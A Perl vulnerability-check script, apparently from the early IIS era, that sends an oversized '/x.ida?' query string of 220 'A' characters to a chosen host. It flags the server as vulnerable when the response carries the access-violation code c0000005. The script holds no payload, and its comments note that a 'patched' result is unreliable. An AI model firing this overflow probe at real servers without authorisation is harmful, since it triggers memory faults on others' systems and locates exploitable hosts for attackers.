#!/usr/bin/perl
###############

# ida_overflow.pl - HDM <hdm@digitaloffense.net>
# most of the code (including libwhisker) by RFP <rfp@wiretrip.net>

# template ripped from apache3.pl

# to use this you need libwhisker-pr3 or newer

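BEGIN {
    # Friendly dependency check.  libwhisker is loaded for real by the
    # `use libwhisker` further down; this block only turns a bare
    # "Can't locate libwhisker.pm" compile error into an explanation of
    # where to get the module.  A block eval replaces the original string
    # eval because nothing here is dynamic.
    if (eval { require libwhisker; 1 }) {
        lw->import();
    } else {
        print "Error: this script requires libwhisker.\n";
        print "\tdownload it and place in the same directory as this script:\n";
        print "\turl => http://www.wiretrip.net/rfp/bins/libwhisker/pr3/libwhisker.pm\n";
        # A missing dependency is a failure; the original `exit` reported
        # success (status 0) to the caller, which hides the problem in
        # scripted use.
        exit 1;
    }
}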

use libwhisker;
use Getopt::Std;

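use strict;
use warnings;

$|++;    # unbuffered STDOUT so the verdict shows up promptly through pipes

my (%hin, %hout, %args);

# Prints the usage text.  Note that -h is the *host* option in this script,
# not "help"; $0 is interpolated here (the original single-quoted it and
# printed the literal characters "$0").
sub _usage {
    print "Usage: $0 <options>, where options:\n";
    print "-h host  host to check (must be specified)\n";
    print "-p ##\t host port (default: 80)\n";
    print "-P host\t HTTP proxy via host\n";
    print "-R ##\t HTTP proxy port (default: 80)\n";
    print "-s\t use SSL (can't be used with proxy)\n";
    return;
}

# getopts returns false on an unparseable option; treat that like a
# missing host but signal failure, whereas a plain "no host given" keeps
# the original exit status 0.
my $parsed_ok = getopts("p:P:R:h:s", \%args);

if (!$parsed_ok || !defined $args{h} || $args{h} eq '') {
    _usage();
    exit($parsed_ok ? 0 : 1);
}

lw::http_init_request(\%hin);    # populate the request hash with libwhisker defaults

$hin{'whisker'}->{'host'} = $args{h};
$hin{'whisker'}->{'port'} = $args{p} || 80;    # an empty or zero -p also falls back to 80

if (defined $args{s}) {
    $hin{'whisker'}->{'ssl'} = 1;

    # libwhisker's proxy support does not tunnel SSL, so the two options
    # are mutually exclusive.
    if (defined $args{P}) {
        print "SSL not currently compatible with proxy\n";
        exit 1;
    }
}

if (defined $args{P}) {
    $hin{'whisker'}->{'proxy_host'} = $args{P};
    $hin{'whisker'}->{'proxy_port'} = $args{R} || 80;
    print "Using proxy host $hin{'whisker'}->{'proxy_host'} on ";
    print "port $hin{'whisker'}->{'proxy_port'}\n";
}

lw::http_fixup_request(\%hin);    # fill in whatever headers the request still needs

# The probe request: an .ida URI with an oversized query-string name.
$hin{'whisker'}->{'uri'} = "/x.ida?" . ("A" x 220) . "=x";

# A non-zero return means the request itself failed (connect, timeout,
# proxy, ...); libwhisker leaves the reason in $hout{'whisker'}->{'error'}.
if (lw::http_do_request(\%hin, \%hout)) {
    print "Error: $hout{'whisker'}->{'error'}\n";
    exit 1;
}

# A vulnerable server answers with an error page that carries the NT
# status code 0xc0000005 ("Access Violation").  Everything else is reported
# as PATCHED, but that verdict is only absence of evidence: a host without
# the .ida mapping, a non-IIS server, or a 404/403 produce the same output.
# NOTE(review): consider also printing the HTTP status line from %hout
# before trusting a PATCHED result in bulk scans.
if ($hout{'whisker'}->{'data'} =~ /c0000005/) {
    print "$args{h} IS VULNERABLE\n";
    exit 0;
}

print "$args{h} IS PATCHED\n";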

